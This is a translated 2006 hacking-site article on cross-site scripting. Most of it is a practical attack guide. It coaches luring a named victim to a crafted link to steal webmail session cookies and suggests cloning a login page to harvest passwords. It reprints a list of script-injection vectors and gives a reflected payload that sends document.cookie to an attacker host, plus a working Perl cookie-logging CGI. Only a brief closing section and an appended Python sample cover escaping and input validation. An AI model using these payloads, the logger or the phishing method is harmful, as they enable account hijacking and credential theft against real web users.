Cross-site scripting vulnerability warning - the black bar safety net

2006-07-11 00:00:00
佚名 (anonymous), www.myhack58.com, MYHACK58:62200610331
What is cross-site scripting (CSS/XSS)?

Cross-site scripting refers to inserting data with a malicious purpose into the HTML code of a remote web page. The user believes the page is trustworthy, but when the browser downloads the page, the embedded script is interpreted.
Cross-site scripting is sometimes called "XSS" because "CSS" generally refers to Cascading Style Sheets, which is easy to confuse. If you hear someone mention a CSS or XSS security vulnerability, it usually means cross-site scripting.

What is the difference between XSS and script injection?

After discussing this with a friend (b0iler), the original author realized that not every attack that inserts a usable script should be called XSS. There is another attack mode, "script injection", and the two differ in the following two points:

  1. Script injection attacks store the inserted script by modifying the remote web page itself, for example through SQL injection or XPath injection.
  2. Cross-site scripting is temporary: it disappears after it has executed.

What types of scripts can be inserted into the remote page?

The mainstream scripts include the following:
HTML
JavaScript (discussed herein)
VBScript
ActiveX
Flash

What causes a site to have an XSS vulnerability?

Many CGI/PHP scripts, when they find that the page requested by the client does not exist or that some other error occurred, print an error message into an HTML file and send that error page to the visitor.
For example: 404 - yourfile.html Not Found!

We generally pay no attention to such messages, but since we now want to study the cause of CSS vulnerabilities, let's take a second look.
Example: www.somesite.tld/cgi-bin/program.cgi?page=downloads.html
The link this URL points to is valid, but if we replace downloads.html with brainrawt_owns_me.html, a page containing "404 - brainrawt_owns_me.html Not Found!" is sent back to the visitor's browser.
Consider how our input got written into the HTML file.

OK, now let's check for the XSS vulnerability!

Note: the following is just one example. If the page has an XSS vulnerability, we can insert a piece of JavaScript code into the page; of course there are many ways to do this.
www.somesite.tld/cgi-bin/program.cgi?page=<script>alert(XSS_Vuln_Testing)</script>
When we submit this URL, does a message box "XSS_Vuln_Testing" pop up in our browser?
This example is only a simple demonstration of an XSS vulnerability, with no practical meaning, but it is enough to illustrate the problem.

Below we analyze the cause of this result. program.cgi performs no effective filtering of our input; it writes it directly into the 404 error page, and the resulting page looks like this:
<html>

<b>404</b> - <script>alert(XSS_Vuln_Testing)</script> Not Found!

</html>

The JavaScript in it is interpreted by the browser, which produces the result you saw.

How is XSS exploited in practice?

As mentioned earlier, if the user's request cannot be satisfied, the server-side script writes the input into an HTML file. When the server-side program does not effectively filter the data it writes into that HTML file, a malicious script can be inserted into it. When other users browse the link, the script is interpreted by the client's browser.

Examples:

Suppose you found that myemailserver.tld has a CSS vulnerability and you want to get hold of an email account; for example, our target is a person called b00b.
www.myemailserver.tld/cgi-bin/news.cgi?article=59035
Modify the link where the CSS vulnerability is present as follows:
www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
This produces an error page from which we get the following information:
Invalid Input! [article=hax0red]

When you insert the following JavaScript code, a message box containing "test" pops up on your screen.
www.myemailserver.tld/cgi-bin/news.cgi?article=<script>alert(test)</script>
The <script> tag itself is not printed to the screen; it executes hidden behind it. Because the server-side program did not effectively filter <script>alert(test)</script>, the page is sent back to the browser and the script is executed.

Below we look at how this vulnerability is exploited to get into comrade b00b's mailbox. First you must know b00b's email address, and you must understand the role of cookies. Then you can send b00b a malicious link; the intention, of course, is to obtain what you want from the cookie information on b00b's machine.
Find a way to get b00b to visit an article published on the myemailserver.tld site, for example: "Dear b00b, take a look at this beauty, how about it?"

Then, when poor b00b visits the link www.myemailserver.tld/cgi-bin/news.cgi?article=<script>steal and save the cookie script</script>, what happens? The cookies are yours; you know what to do!

If you are not currently in such a situation, you can copy the email server's login page, host it on another system, and then guide the user to log in on your malicious page. The user's information is recorded, and the recorded information is then forwarded to the real email server page, so those fools never realize what is actually happening.

Different methods of putting a JavaScript script into a WEB page:

<snip>
Copied from: GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection *s
you may derive some glee from playing with.

<a href="javascript#[code]">
<div >
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src="&";{[code]}; a> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body >
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah">
<img src="blah>" >
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

---- Copied from GOBBLES SECURITY ADVISORY #33 ----
</snip>

A real example of obtaining the cookie and recording it:

Note: for this to work, your browser must accept cookies sent by the http://website.tld site. When I tested the following, I used JavaScript to create the visitor's cookie; that JavaScript was placed in the index.html file.
OK, the following assumes that http://website.tld has an XSS security risk, and the vulnerable link is:
http://website.tld/program.cgi?input=<evil javascript>
We create a link like this:
http://website.tld/program.cgi?input=<script>document.location='http://yoursite.tld/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
Then get a user who has this site's cookie saved to visit this link.

This is our CGI script; its role is to record the user's cookie:

---------evil_cookie_logger.cgi-----------

#!/usr/bin/perl
#
# evil_cookie_logger.cgi
#
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.

# The query string (everything after "?") carries the value of document.cookie.
$borrowed_info = $ENV{QUERY_STRING};
# Undo URL percent-encoding so the logged value is readable.
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type: text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);

------------------------------------------

The script takes the cookie from $ENV{QUERY_STRING} and stores it in the $borrowed_info variable; through open(EVIL_COOKIE_LOG, ">>evil_cookie_log") the cookie information is appended to the evil_cookie_log file.

Note: the above JavaScript may not run in some browsers or on some sites; I only tested it on my own site.

How to prevent XSS attacks?

  1. Disable JavaScript in your WEB browser.
  2. Developers must carefully audit their code and validate submitted input data, for example checking for "<" and ">".

You can convert "<" and ">" to &lt; and &gt;.
Note: because XSS vulnerabilities can be exploited in many different ways, programmers themselves must understand which specific characters need to be filtered; this depends mainly on what the program does. It is recommended to filter out all meta-characters, including "=".
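As an added illustration (not the article's program.cgi, and not code from the original author), the following Python reproduces the "404 - page Not Found!" error page discussed above, once reflecting the page name unfiltered and once with the input validation and entity conversion recommended here. The URLs are the article's own; the function names and the page-name pattern are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical stand-in for the article's program.cgi (name and structure
# are assumptions); it builds the "404 - <page> Not Found!" error page.
ERROR_TEMPLATE = "<html>\n<b>404</b> - %s Not Found!\n</html>"

# Characters a legitimate file name can contain. Anything else, including
# "=", which the article recommends filtering, is rejected up front.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def page_param(url):
    """Return the percent-decoded 'page' query parameter, '' if absent."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("page", [""])[0]


def render_404_vulnerable(page):
    # The article's bug: the requested name is copied into the HTML verbatim,
    # so a name containing <script> becomes a script the browser executes.
    return ERROR_TEMPLATE % page


def render_404_safe(page):
    # Convert "<", ">", "&" and quotes to entities so the browser displays
    # the text instead of interpreting it as markup.
    return ERROR_TEMPLATE % html.escape(page, quote=True)


def handle_request(url, hardened=True):
    """Serve the error page for a URL, with or without the defences."""
    page = page_param(url)
    if not hardened:
        return render_404_vulnerable(page)
    if not PAGE_NAME.match(page):
        # The rejection message reflects input as well, so it is escaped too.
        return "Invalid Input! [page=%s]" % html.escape(page, quote=True)
    return render_404_safe(page)


def reflects_unescaped(body, probe):
    """Audit check: does a probe string come back in the response verbatim?"""
    return probe in body


# The article's own test URL, used here as constructed sample input.
PROBE = "<script>alert(XSS_Vuln_Testing)</script>"
TEST_URL = "http://www.somesite.tld/cgi-bin/program.cgi?page=" + PROBE
```

Running handle_request(TEST_URL, hardened=False) returns the exact page shown earlier in the article, while the hardened path returns the probe as harmless &lt;script&gt; text.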

For potential victims: do not visit links that contain <script> characters; legitimate official URLs do not include any script elements.